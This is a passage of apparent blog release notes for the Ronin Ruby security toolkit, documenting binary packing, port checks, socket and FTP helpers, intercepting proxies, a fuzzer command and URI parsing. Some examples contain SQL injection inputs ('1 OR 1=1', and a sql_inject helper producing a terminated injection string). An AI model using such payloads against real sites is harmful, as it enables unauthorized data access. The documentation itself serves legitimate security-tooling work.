unpacking data.</p> <div class="highlight"><pre><code class="ruby"><span class="n">template</span> <span class="o">=</span> <span class="ss">Binary</span><span class="p">:</span><span class="ss">:Template</span><span class="o">[</span><span class="ss">:uint16_be</span><span class="p">,</span> <span class="ss">:string</span><span class="o">]</span> <span class="n">template</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="mh">0x5</span><span class="p">,</span> <span class="s2">&quot;hello&quot;</span><span class="p">)</span> <span class="c1"># =&gt; &quot;\x00\x05hello\x00&quot;</span> <span class="n">template</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="s2">&quot;</span><span class="se">\x00\x05</span><span class="s2">hello</span><span class="se">\x00</span><span class="s2">&quot;</span><span class="p">)</span> <span class="c1"># =&gt; [5, &quot;hello&quot;]</span> </code></pre></div> <h3>Binary::Struct</h3> <p><a href="/docs/ronin-support/Ronin/Binary/Struct.html">Binary::Struct</a> was also added to ronin-support 0.5.0. It is similar to <a href="http://metafuzz.rubyforge.org/binstruct/">BinStruct</a>, but provides the same API as <a href="https://github.com/ffi/ffi/wiki/Structs">FFI::Struct</a>. It supports typedefs, Array fields, nested-Structs and overriding reader/writer methods of fields.</p> <div class="highlight"><pre><code class="ruby"><span class="nb">require</span> <span class="s1">&#39;ronin/binary/struct&#39;</span> <span class="k">class</span> <span class="nc">Packet</span> <span class="o">&lt;</span> <span class="ss">Binary</span><span class="p">:</span><span class="ss">:Struct</span> <span class="n">endian</span> <span class="ss">:network</span> <span class="n">layout</span> <span class="ss">:length</span><span class="p">,</span> <span class="ss">:uint32</span><span class="p">,</span> <span class="ss">:data</span><span class="p">,</span> <span class="o">[</span><span class="ss">:uchar</span><span class="p">,</span> <span class="mi">48</span><span class="o">]</span> <span class="k">end</span> <span class="n">pkt</span> <span class="o">=</span> <span class="no">Packet</span><span class="o">.</span><span class="n">new</span> <span class="n">pkt</span><span class="o">.</span><span class="n">length</span> <span class="o">=</span> <span class="mi">5</span> <span class="n">pkt</span><span class="o">.</span><span class="n">data</span> <span class="o">=</span> <span class="s1">&#39;hello&#39;</span> <span class="n">buffer</span> <span class="o">=</span> <span class="n">pkt</span><span class="o">.</span><span class="n">pack</span> <span class="c1"># =&gt; &quot;\x00\x00\x00\x05hello\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00&quot;</span> <span class="n">new_pkt</span> <span class="o">=</span> <span class="no">Packet</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="n">buffer</span><span class="p">)</span> <span class="c1"># =&gt; #&lt;Packet: length: 5, data: &quot;hello&quot;&gt;</span> </code></pre></div> <h3>tcp_open? / udp_open?</h3> <p>The <a href="/docs/ronin-support/Ronin/Network/TCP.html#tcp_open%3F-instance_method">tcp_open?</a> and <a href="/docs/ronin-support/Ronin/Network/UDP.html#udp_open%3F-instance_method">udp_open?</a> methods were added to ronin-support 0.5.0. These methods perform basic tests to determine if a TCP / UDP port is open.</p> <div class="highlight"><pre><code class="ruby"><span class="n">tcp_open?</span><span class="p">(</span><span class="s1">&#39;example.com&#39;</span><span class="p">,</span><span class="mi">80</span><span class="p">)</span> <span class="c1"># =&gt; true</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">udp_open?</span><span class="p">(</span><span class="s1">&#39;4.2.2.1&#39;</span><span class="p">,</span><span class="mi">53</span><span class="p">)</span> <span class="c1"># =&gt; true</span> </code></pre></div> <h3>Network::UNIX</h3> <p><a href="/docs/ronin-support/Ronin/Network/UNIX.html">Network::UNIX</a> was added to help communicating with UNIX sockets.</p> <div class="highlight"><pre><code class="ruby"><span class="n">unix_connect</span><span class="p">(</span><span class="s1">&#39;/tmp/haproxy.stats.socket&#39;</span><span class="p">)</span> <span class="c1"># =&gt; #&lt;UNIXSocket:...&gt;</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">unix_session</span><span class="p">(</span><span class="s1">&#39;/tmp/haproxy.stats.socket&#39;</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">socket</span><span class="o">|</span> <span class="n">socket</span><span class="o">.</span><span class="n">puts</span><span class="p">(</span><span class="s2">&quot;show stat&quot;</span><span class="p">)</span> <span class="nb">puts</span> <span class="n">socket</span><span class="o">.</span><span class="n">readlines</span> <span class="k">end</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">unix_accept</span><span class="p">(</span><span class="s1">&#39;/tmp/race_condition.socket&#39;</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">socket</span><span class="o">|</span> <span class="n">sockets</span><span class="o">.</span><span class="n">puts</span><span class="p">(</span><span class="n">buffer</span><span class="p">)</span> <span class="k">end</span> </code></pre></div> <h3>Network::FTP</h3> <p><a href="/docs/ronin-support/Ronin/Network/FTP.html">Network::FTP</a> was added to provide the same helper methods as <a href="/docs/ronin-support/Ronin/Network/IMAP.html">Network::IMAP</a>, but for communicating with FTP Servers.</p> <div class="highlight"><pre><code class="ruby"><span class="n">ftp_connect</span><span class="p">(</span><span class="s1">&#39;www.example.com&#39;</span><span class="p">,</span> <span class="ss">:user</span> <span class="o">=&gt;</span> <span class="s1">&#39;joe&#39;</span><span class="p">,</span> <span class="ss">:password</span> <span class="o">=&gt;</span> <span class="s1">&#39;secret&#39;</span><span class="p">)</span> <span class="c1"># =&gt; #&lt;Net::FTP:...&gt;</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="n">ftp_session</span><span class="p">(</span><span class="s1">&#39;ftp.kernel.org&#39;</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">ftp</span><span class="o">|</span> <span class="n">ftp</span><span class="o">.</span><span class="n">chdir</span><span class="p">(</span><span class="s1">&#39;/pub&#39;</span><span class="p">)</span> <span class="nb">puts</span> <span class="n">ftp</span><span class="o">.</span><span class="n">list</span> <span class="k">end</span> </code></pre></div> <h3>Network::TCP::Proxy / Network::UDP::Proxy</h3> <p><a href="/docs/ronin-support/Ronin/Network/TCP/Proxy.html">Network::TCP::Proxy</a> and <a href="/docs/ronin-support/Ronin/Network/UDP/Proxy.html">Network::UDP::Proxy</a> were added as well. Finally, you can create simple evented TCP/UDP proxies, to intercept or rewrite messages.</p> <div class="highlight"><pre><code class="ruby"><span class="nb">require</span> <span class="s1">&#39;ronin/network/tcp/proxy&#39;</span> <span class="nb">require</span> <span class="s1">&#39;hexdump&#39;</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:Network</span><span class="o">::</span><span class="ss">TCP</span><span class="p">:</span><span class="ss">:Proxy</span><span class="o">.</span><span class="n">start</span><span class="p">(</span><span class="ss">:port</span> <span class="o">=&gt;</span> <span class="mi">1337</span><span class="p">,</span> <span class="ss">:server</span> <span class="o">=&gt;</span> <span class="o">[</span><span class="s1">&#39;www.wired.com&#39;</span><span class="p">,</span> <span class="mi">80</span><span class="o">]</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">proxy</span><span class="o">|</span> <span class="n">address</span> <span class="o">=</span> <span class="nb">lambda</span> <span class="p">{</span> <span class="o">|</span><span class="n">socket</span><span class="o">|</span> <span class="n">addrinfo</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">peeraddr</span> <span class="s2">&quot;</span><span class="si">#{</span><span class="n">addrinfo</span><span class="o">[</span><span class="mi">3</span><span class="o">]</span><span class="si">}</span><span class="s2">:</span><span class="si">#{</span><span class="n">addrinfo</span><span class="o">[</span><span class="mi">1</span><span class="o">]</span><span class="si">}</span><span class="s2">&quot;</span> <span class="p">}</span> <span class="n">hex</span> <span class="o">=</span> <span class="ss">Hexdump</span><span class="p">:</span><span class="ss">:Dumper</span><span class="o">.</span><span class="n">new</span> <span class="n">proxy</span><span class="o">.</span><span class="n">on_client_data</span> <span class="k">do</span> <span class="o">|</span><span class="n">client</span><span class="p">,</span><span class="n">server</span><span class="p">,</span><span class="n">data</span><span class="o">|</span> <span class="nb">puts</span> <span class="s2">&quot;</span><span class="si">#{</span><span class="n">address</span><span class="o">[</span><span class="n">client</span><span class="o">]</span><span class="si">}</span><span class="s2"> -&gt; </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2">&quot;</span> <span class="n">hex</span><span class="o">.</span><span class="n">dump</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="k">end</span> <span class="n">proxy</span><span class="o">.</span><span class="n">on_client_connect</span> <span class="k">do</span> <span class="o">|</span><span class="n">client</span><span class="o">|</span> <span class="nb">puts</span> <span class="s2">&quot;</span><span class="si">#{</span><span class="n">address</span><span class="o">[</span><span class="n">client</span><span class="o">]</span><span class="si">}</span><span class="s2"> -&gt; </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2"> [connected]&quot;</span> <span class="k">end</span> <span class="n">proxy</span><span class="o">.</span><span class="n">on_client_disconnect</span> <span class="k">do</span> <span class="o">|</span><span class="n">client</span><span class="p">,</span><span class="n">server</span><span class="o">|</span> <span class="nb">puts</span> <span class="s2">&quot;</span><span class="si">#{</span><span class="n">address</span><span class="o">[</span><span class="n">client</span><span class="o">]</span><span class="si">}</span><span class="s2"> &lt;- </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2"> [disconnected]&quot;</span> <span class="k">end</span> <span class="n">proxy</span><span class="o">.</span><span class="n">on_server_data</span> <span class="k">do</span> <span class="o">|</span><span class="n">client</span><span class="p">,</span><span class="n">server</span><span class="p">,</span><span class="n">data</span><span class="o">|</span> <span class="nb">puts</span> <span class="s2">&quot;</span><span class="si">#{</span><span class="n">address</span><span class="o">[</span><span class="n">client</span><span class="o">]</span><span class="si">}</span><span class="s2"> &lt;- </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2">&quot;</span> <span class="n">hex</span><span class="o">.</span><span class="n">dump</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="k">end</span> <span class="n">proxy</span><span class="o">.</span><span class="n">on_server_connect</span> <span class="k">do</span> <span class="o">|</span><span class="n">client</span><span class="p">,</span><span class="n">server</span><span class="o">|</span> <span class="nb">puts</span> <span class="s2">&quot;</span><span class="si">#{</span><span class="n">address</span><span class="o">[</span><span class="n">client</span><span class="o">]</span><span class="si">}</span><span class="s2"> &lt;- </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2"> [connected]&quot;</span> <span class="k">end</span> <span class="n">proxy</span><span class="o">.</span><span class="n">on_server_disconnect</span> <span class="k">do</span> <span class="o">|</span><span class="n">client</span><span class="p">,</span><span class="n">server</span><span class="o">|</span> <span class="nb">puts</span> <span class="s2">&quot;</span><span class="si">#{</span><span class="n">address</span><span class="o">[</span><span class="n">client</span><span class="o">]</span><span class="si">}</span><span class="s2"> &lt;- </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2"> [disconnected]&quot;</span> <span class="k">end</span> <span class="k">end</span> </code></pre></div> <div class="highlight"><pre><code class="ruby"><span class="nb">require</span> <span class="s1">&#39;ronin/network/udp/proxy&#39;</span> <span class="nb">require</span> <span class="s1">&#39;hexdump&#39;</span> <span class="ss">Ronin</span><span class="p">:</span><span class="ss">:Network</span><span class="o">::</span><span class="ss">UDP</span><span class="p">:</span><span class="ss">:Proxy</span><span class="o">.</span><span class="n">start</span><span class="p">(</span><span class="ss">:port</span> <span class="o">=&gt;</span> <span class="mi">1337</span><span class="p">,</span> <span class="ss">:server</span> <span class="o">=&gt;</span> <span class="o">[</span><span class="s1">&#39;4.2.2.1&#39;</span><span class="p">,</span> <span class="mi">53</span><span class="o">]</span><span class="p">)</span> <span class="k">do</span> <span class="o">|</span><span class="n">proxy</span><span class="o">|</span> <span class="n">hex</span> <span class="o">=</span> <span class="ss">Hexdump</span><span class="p">:</span><span class="ss">:Dumper</span><span class="o">.</span><span class="n">new</span> <span class="n">proxy</span><span class="o">.</span><span class="n">on_client_data</span> <span class="k">do</span> <span class="o">|</span><span class="p">(</span><span class="n">client</span><span class="p">,(</span><span class="n">host</span><span class="p">,</span><span class="n">port</span><span class="p">)),</span><span class="n">server</span><span class="p">,</span><span class="n">data</span><span class="o">|</span> <span class="nb">puts</span> <span class="s2">&quot;</span><span class="si">#{</span><span class="n">host</span><span class="si">}</span><span class="s2">:</span><span class="si">#{</span><span class="n">port</span><span class="si">}</span><span class="s2"> -&gt; </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2">&quot;</span> <span class="n">hex</span><span class="o">.</span><span class="n">dump</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="k">end</span> <span class="n">proxy</span><span class="o">.</span><span class="n">on_server_data</span> <span class="k">do</span> <span class="o">|</span><span class="p">(</span><span class="n">client</span><span class="p">,(</span><span class="n">host</span><span class="p">,</span><span class="n">port</span><span class="p">)),</span><span class="n">server</span><span class="p">,</span><span class="n">data</span><span class="o">|</span> <span class="nb">puts</span> <span class="s2">&quot;</span><span class="si">#{</span><span class="n">host</span><span class="si">}</span><span class="s2">:</span><span class="si">#{</span><span class="n">port</span><span class="si">}</span><span class="s2"> &lt;- </span><span class="si">#{</span><span class="n">proxy</span><span class="si">}</span><span class="s2">&quot;</span> <span class="n">hex</span><span class="o">.</span><span class="n">dump</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="k">end</span> <span class="k">end</span> </code></pre></div> <h3>Console Commands</h3> <p>In ronin 1.5.0, one can now embed variables into shell commands:</p> <pre><code>&gt;&gt; !ncat #{ip} #{port} </code></pre> <p>Special Console commands (<code>edit</code>) have been separated from shell commands (<code>!netstat -an</code>) and are now prefixed with a <code>.</code>:</p> <pre><code>&gt;&gt; .edit </code></pre> <h3>ronin net:proxy</h3> <p>Building on <a href="/docs/ronin-support/Ronin/Network/TCP/Proxy.html">Network::TCP::Proxy</a> and <a href="/docs/ronin-support/Ronin/Network/UDP/Proxy.html">Network::UDP::Proxy</a>, the <a href="/docs/ronin/Ronin/UI/CLI/Commands/Net/Proxy.html">net:proxy</a> command was added to ronin 1.5.0 for quick proxying.</p> <pre><code>$ ronin net:proxy --port 8080 --server google.com:80 $ ronin net:proxy --port 53 --server 4.2.2.1 --udp --hexdump </code></pre> <h3>ronin fuzzer</h3> <p>The <a href="/docs/ronin/Ronin/UI/CLI/Commands/Fuzzer.html">fuzzer</a> command was also added to ronin 1.5.0, for quick and dirty fuzzing of files, commands, TCP/UDP Services.</p> <pre><code>$ ronin fuzzer -i request.txt -o bad.txt -r unix_path:bad_strings </code></pre> <h3>Man pages</h3> <p>Ronin 1.5.0 now sports professional man-pages for every command. The man-pages are viewed using the <code>ronin help</code> command.</p> <pre><code>$ ronin-help wordlist </code></pre> <h2>Update</h2> <p>Due to a few minor bugs that slipped past QA, <a href="/docs/ronin-support/file.ChangeLog.html">ronin-support 0.5.1</a> has been released:</p> <pre><code>$ gem update ronin-support </code></pre> <ul> <li><a href="http://rubygems.org/downloads/ronin-support-0.5.1.gem">ronin-support-0.5.1.gem</a>: <ul> <li><strong>MD5</strong>: <code>4e7a07c174d27f8f2c33f43002357ab3</code></li> <li><strong>SHA1</strong>: <code>1a5f5580b0e7b76e5271e60db30d17bc6702b61a</code></li> <li><a href="https://github.com/downloads/ronin-ruby/ronin-support/ronin-support-0.5.1.gem.asc">PGP</a></li> </ul> </li> </ul> Thu Jun 07 00:00:00 -0700 2012 postmodern http://ronin-ruby.gihtub.io/blog/2012/06/07/ronin-1.5.0-rc2-released.html <p><a href="http://rubygems.org/gems/ronin-support/versions/0.5.0.rc2">ronin-support 0.5.0.rc2</a>, <a href="http://rubygems.org/gems/ronin/versions/1.5.0.rc2">ronin 1.5.0.rc2</a> and <a href="http://rubygems.org/gems/ronin-gen/versions/1.2.0.rc2">ronin-gen 1.2.0.rc2</a> have been released.</p> <pre><code>$ gem install ronin-support ronin ronin-gen --pre </code></pre> <h3>Checksums</h3> <ul> <li><code>ronin-support-0.5.0.rc2.gem</code> <ul> <li><strong>MD5:</strong> <code>f6e8039f25723612ffc634d1c6ca0854</code></li> <li><strong>SHA1:</strong> <code>14df56b762b4a8a2439551e638b76c9a6375adde</code></li> <li><a href="https://github.com/downloads/ronin-ruby/ronin-support/ronin-support-0.5.0.rc2.gem.asc">PGP</a></li> </ul> </li> <li><code>ronin-1.5.0.rc2.gem</code> <ul> <li><strong>MD5:</strong> <code>95746681d6cdbfd385bed63b43166b5f</code></li> <li><strong>SHA1:</strong> <code>edc5e60fa415843f882802c8ef059ee37a8dd49e</code></li> <li><a href="https://github.com/downloads/ronin-ruby/ronin/ronin-1.5.0.rc2.gem.asc">PGP</a></li> </ul> </li> <li><code>ronin-gen-1.2.0.rc2.gem</code> <ul> <li><strong>MD5:</strong> <code>8bd309dccb32e585f0c2e585bb7ab29d</code></li> <li><strong>SHA1:</strong> <code>ecc6efba1c674de73ea649b1051d76077c91ea44</code></li> <li><a href="https://github.com/downloads/ronin-ruby/ronin-gen/ronin-gen-1.2.0.rc2.gem.asc">PGP</a></li> </ul> </li> </ul> <h3>ChangeLogs</h3> <ul> <li><a href="https://github.com/ronin-ruby/ronin-support/blob/0.5.0/ChangeLog.md#050--2012-05-28">ronin-support 0.5.0</a></li> <li><a href="https://github.com/ronin-ruby/ronin/blob/1.5.0/ChangeLog.md#150--2012-05-28">ronin 1.5.0</a></li> <li><a href="https://github.com/ronin-ruby/ronin-gen/blob/1.2.0/ChangeLog.md#120--2012-05-28">ronin-gen 1.2.0</a></li> </ul> <h3>How Can You Help?</h3> <p>We would love your help testing these release candidates. Here are some things you can do:</p> <ol> <li><p>Install the Gems:</p> <pre><code> $ gem install ronin-support ronin ronin-gen --pre </code></pre></li> <li><p>Test the new code, such as <a href="https://github.com/ronin-ruby/ronin-support/blob/0.5.0/lib/ronin/formatting/extensions/binary/integer.rb#L90-127">Integer#pack</a>, <a href="https://github.com/ronin-ruby/ronin-support/blob/0.5.0/lib/ronin/formatting/extensions/binary/float.rb#L24-49">Float#pack</a>, <a href="https://github.com/ronin-ruby/ronin-support/blob/0.5.0/lib/ronin/formatting/extensions/binary/array.rb#L26-51">Array#pack</a>, <a href="https://github.com/ronin-ruby/ronin-support/blob/0.5.0/lib/ronin/formatting/extensions/binary/array.rb#L26-51">String#unpack</a>, <a href="https://github.com/ronin-ruby/ronin-support/blob/0.5.0/lib/ronin/binary/struct.rb#L26-49">Ronin::Binary::Struct</a>, <a href="https://github.com/ronin-ruby/ronin-support/blob/0.5.0/lib/ronin/network/tcp/proxy.rb#L27-76">Ronin::Network::TCP::Proxy</a> (<a href="https://gist.github.com/2657303">example</a>) and <a href="https://github.com/ronin-ruby/ronin-support/blob/0.5.0/lib/ronin/network/udp/proxy.rb#L30">Ronin::Network::UDP::Proxy</a> (<a href="https://gist.github.com/2919927">example</a>).</p></li> <li>Test the new commands, such as <a href="https://github.com/ronin-ruby/ronin/blob/1.5.0/lib/ronin/ui/cli/commands/net/proxy.rb#L31-75">ronin-net-proxy</a>.</li> <li><p>Review the new man-pages.</p> <pre><code> $ ronin-help wordlist </code></pre></li> <li><p>Review the documentation:</p> <pre><code> $ yard server -g -d $ $BROWSER http://localhost:8808/docs/ronin-support/0.5.0.rc2/frames $ $BROWSER http://localhost:8808/docs/ronin/1.5.0.rc2/frames $ $BROWSER http://localhost:8808/docs/ronin-gen/1.2.0.rc2/frames </code></pre></li> </ol> Thu Apr 19 00:00:00 -0700 2012 postmodern http://ronin-ruby.gihtub.io/blog/2012/04/19/installing-ronin-on-backtrack-linux.html <p><a href="http://www.backtrack-linux.org/">BackTrack Linux</a> 5r2 was <a href="http://www.backtrack-linux.org/backtrack/backtrack-5-r2-released/">released</a> on March 1st, and ships with newer versions of just about everything. So I thought it was high time that we did a blog post on howto install Ronin on BackTrack Linux (BT) 5.</p> <p>What is particularly nice about BT 5, is it ships with Ruby 1.9.2 and a few common RubyGems (<code>bundler</code>, <code>rails</code>, etc). Also, the few libraries/header-files which Ronin needs for installation (particularly <code>libsqlite3</code>) were already installed. This made installing Ronin on BT 5 as simple as:</p> <pre><code>gem install ronin </code></pre> <p>This will install Ronin and drop the <code>ronin</code> executable into <code>/etc/alternatives/gem-bin/</code>. Now you should be able to start the Ronin console:</p> <pre><code># ronin &gt;&gt; VERSION =&gt; "1.4.1" &gt;&gt; !uname -a Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux =&gt; true </code></pre> Thu Mar 15 00:00:00 -0700 2012 postmodern http://ronin-ruby.gihtub.io/blog/2012/03/15/parsing-uris-is-easy.html <p>Despite what others may <a href="https://community.rapid7.com/community/metasploit/blog/2012/03/12/uri-parsing-its-harder-than-you-think">say</a>, parsing URIs is <em>not</em> hard.</p> <p>In fact, Ruby already makes parsing URIs fairly easy with the <code>URI()</code> method.</p> <div class="highlight"><pre><code class="ruby"><span class="n">uri</span> <span class="o">=</span> <span class="no">URI</span><span class="p">(</span><span class="s1">&#39;http://www.google.com/search?q=parsing+URIs+is+hard%2C+let%27s+go+shopping&amp;ie=utf-8&amp;oe=utf-8&amp;aq=t&amp;rls=org.mozilla:en-US:unofficial&amp;client=firefox-a&#39;</span><span class="p">)</span> <span class="c1"># =&gt; #&lt;URI::HTTP:0x00000000f94188 URL:http://www.google.com/search?q=parsing+URIs+is+hard%2C+let%27s+go+shopping&amp;ie=utf-8&amp;oe=utf-8&amp;aq=t&amp;rls=org.mozilla:en-US:unofficial&amp;client=firefox-a&gt;</span> </code></pre></div> <h2>Query Params</h2> <p>Although, the <a href="http://rubydoc.info/stdlib/uri">URI</a> library does not parse the parameters within the query string. Ronin, like other modern Ruby projects, depends on many other smaller <a href="http://rubygems.org/">RubyGems</a> for functionality; also so you don't have to install and require them by hand. One such RubyGem is <a href="https://github.com/postmodern/uri-query_params#readme">uri-query_params</a>, which allows you to access the parameters within the query string of <em>any</em> <a href="http://rubydoc.info/stdlib/uri/1.9.2/URI/HTTP">URI::HTTP</a> (or <a href="http://rubydoc.info/stdlib/uri/1.9.2/URI/HTTPS">URI::HTTPS</a>) object:</p> <div class="highlight"><pre><code class="ruby"><span class="n">uri</span><span class="o">.</span><span class="n">query_params</span><span class="o">[</span><span class="s1">&#39;q&#39;</span><span class="o">]</span> <span class="c1"># =&gt; &quot;parsing+URIs+is+hard,+let&#39;s+go+shopping&quot;</span> <span class="n">pp</span> <span class="n">uri</span><span class="o">.</span><span class="n">query_params</span> <span class="c1"># {&quot;q&quot;=&gt;&quot;parsing+URIs+is+hard,+let&#39;s+go+shopping&quot;,</span> <span class="c1"># &quot;ie&quot;=&gt;&quot;utf-8&quot;,</span> <span class="c1"># &quot;oe&quot;=&gt;&quot;utf-8&quot;,</span> <span class="c1"># &quot;aq&quot;=&gt;&quot;t&quot;,</span> <span class="c1"># &quot;rls&quot;=&gt;&quot;org.mozilla:en-US:unofficial&quot;,</span> <span class="c1"># &quot;client&quot;=&gt;&quot;firefox-a&quot;}</span> <span class="c1"># =&gt; {&quot;q&quot;=&gt;&quot;parsing+URIs+is+hard,+let&#39;s+go+shopping&quot;, &quot;ie&quot;=&gt;&quot;utf-8&quot;, &quot;oe&quot;=&gt;&quot;utf-8&quot;, &quot;aq&quot;=&gt;&quot;t&quot;, &quot;rls&quot;=&gt;&quot;org.mozilla:en-US:unofficial&quot;, &quot;client&quot;=&gt;&quot;firefox-a&quot;}</span> </code></pre></div> <p>Additionally, you can <a href="http://rubydoc.info/gems/uri-query_params/URI/QueryParams#parse-class_method">parse</a>/<a href="http://rubydoc.info/gems/uri-query_params/URI/QueryParams#dump-class_method">dump</a> individual query strings:</p> <div class="highlight"><pre><code class="ruby"><span class="ss">URI</span><span class="p">:</span><span class="ss">:QueryParams</span><span class="o">.</span><span class="n">parse</span><span class="p">(</span><span class="s2">&quot;q=1&amp;x=2&quot;</span><span class="p">)</span> <span class="c1"># =&gt; {&quot;q&quot; =&gt; &quot;1&quot;, &quot;x&quot; =&gt; &quot;2&quot;}</span> <span class="ss">URI</span><span class="p">:</span><span class="ss">:QueryParams</span><span class="o">.</span><span class="n">dump</span><span class="p">(</span><span class="ss">:q</span> <span class="o">=&gt;</span> <span class="mi">1</span><span class="p">,</span> <span class="ss">:x</span> <span class="o">=&gt;</span> <span class="mi">2</span><span class="p">)</span> <span class="c1"># =&gt; &quot;q=1&amp;x=2&quot;</span> </code></pre></div> <div class="note"> <p> The <kbd>URI::QueryParams.dump</kbd> method is also used by <a href="/docs/ronin-support/Ronin/Network/HTTP.html">HTTP</a> helper methods for the <kbd>:query_params</kbd> option: </p> <div class="highlight"><pre><code class="ruby"><span class="n">http_get</span><span class="p">(</span><span class="ss">:host</span> <span class="o">=&gt;</span> <span class="s1">&#39;example.com&#39;</span><span class="p">,</span> <span class="ss">:path</span> <span class="o">=&gt;</span> <span class="s1">&#39;/page.php&#39;</span><span class="p">,</span> <span class="ss">:query_params</span> <span class="o">=&gt;</span> <span class="p">{</span><span class="s1">&#39;id&#39;</span> <span class="o">=&gt;</span> <span class="s2">&quot;1 OR 1=1&quot;</span><span class="p">})</span> </code></pre></div> </div> <h2>Non-standard URIs</h2> <p>There are URIs that Ruby has trouble parsing, such as so called <a href="http://en.wikipedia.org/wiki/Punycode">punycode</a> domains. Not to worry, Ronin also requires the <a href="https://github.com/sporkmonger/addressable#readme">addressable</a> RubyGem, a URI parsing library on steroids:</p> <div class="highlight"><pre><code class="ruby"><span class="n">uri</span> <span class="o">=</span> <span class="ss">Addressable</span><span class="p">:</span><span class="ss">:URI</span><span class="o">.</span><span class="n">parse</span><span class="p">(</span><span class="s2">&quot;http://www.詹姆斯.com/?q=1&quot;</span><span class="p">)</span> <span class="c1"># =&gt; #&lt;Addressable::URI:0xb525d4 URI:http://www.詹姆斯.com/?q=1&gt;</span> <span class="n">uri</span><span class="o">.</span><span class="n">normalize</span> <span class="c1"># =&gt; #&lt;Addressable::URI:0xb57bec URI:http://www.xn--8ws00zhy3a.com/?q=1&gt;</span> </code></pre></div> <p>With Ronin, parsing URIs is easy.</p> Wed Mar 14 00:00:00 -0700 2012 postmodern http://ronin-ruby.gihtub.io/blog/2012/03/14/ronin-is-now-on-reddit.html <p>Thanks to user suggestion, Ronin is now on <a href="http://reddit.com/r/ronin_ruby">Reddit</a> (with 35 readers so far)!</p> <p>Send us your links, questions or tips for Ronin or other Ruby hacking.</p> Fri Feb 17 00:00:00 -0800 2012 postmodern http://ronin-ruby.gihtub.io/blog/2012/02/17/ronin-1-4-0-released.html <p>After many months of development and release candidates I am pleased to announce that <a href="/docs/ronin-support/">ronin-support</a> <a href="/docs/ronin-support/file.ChangeLog.html">0.4.0</a>, <a href="/docs/ronin/">ronin</a> <a href="/docs/ronin/file.ChangeLog.html">1.4.0</a> and <a href="/docs/ronin-gen/">ronin-gen</a> <a href="/docs/ronin-gen/file.ChangeLog.html">1.1.0</a> have been released.</p> <pre><code>gem update ronin-support ronin ronin-gen </code></pre> <p>So what's new?</p> <h2>ronin-support 0.4.0</h2> <h3>Common Regular Expressions</h3> <p>Many common and useful Regular Expressions constants were added to the <a href="/docs/ronin-support/Regexp.html">Regexp</a> class.</p> <div class="highlight"><pre><code class="ruby"><span class="s2">&quot;Please see C:</span><span class="se">\\</span><span class="s2">Documents</span><span class="se">\\</span><span class="s2">plans.docx&quot;</span><span class="o">.</span><span class="n">scan</span><span class="p">(</span><span class="ss">Regexp</span><span class="p">:</span><span class="ss">:ABSOLUTE_WINDOWS_PATH</span><span class="p">)</span> <span class="c1"># =&gt; [&quot;C:\\Documents\\plans.docx&quot;]</span> </code></pre></div> <h3>New String methods</h3> <p><a href="/docs/ronin-support/String.html#repeating-instance_method">String#repeating</a> was added which allows creating multiple repeating Strings:</p> <div class="highlight"><pre><code class="ruby"><span class="s1">&#39;A&#39;</span><span class="o">.</span><span class="n">repeating</span><span class="p">((</span><span class="mi">100</span><span class="o">.</span><span class="n">.</span><span class="mi">700</span><span class="p">)</span><span class="o">.</span><span class="n">step</span><span class="p">(</span><span class="mi">100</span><span class="p">))</span> <span class="p">{</span> <span class="o">|</span><span class="n">str</span><span class="o">|</span> <span class="nb">puts</span> <span class="n">str</span> <span class="p">}</span> </code></pre></div> <p><a href="/docs/ronin-support/String.html#sql_inject-instance_method">String#sql_inject</a> was also added, allowing for easy formatting of SQL injections:</p> <div class="highlight"><pre><code class="ruby"><span class="s2">&quot;&#39;1&#39; OR 1=1&quot;</span><span class="o">.</span><span class="n">sql_inject</span><span class="p">(</span><span class="ss">:terminate</span> <span class="o">=&gt;</span> <span class="kp">true</span><span class="p">)</span> <span class="c1"># =&gt; &quot;1&#39; OR 1=1 --&quot;</span> </code></pre></div> <h3>Base64 formatting</h3> <p><a href="/docs/ronin-support/String.html#base64_encode-instance_method">String#base64_encode</a> and <a href="/docs/ronin-support/String.html#base64_decode-instance_method">String#base64_decode</a> now accept formatting arguments:</p> <div class="highlight"><pre><code class="ruby"><span class="p">(</span><span class="s2">&quot;A&quot;</span> <span class="o">*</span> <span class="mi">256</span><span class="p">)</span><span class="o">.</span><span class="n">base64_encode</span><span class="p">(</span><span class="ss">:strict</span><span class="p">)</span> <span class="c1"># =&gt; 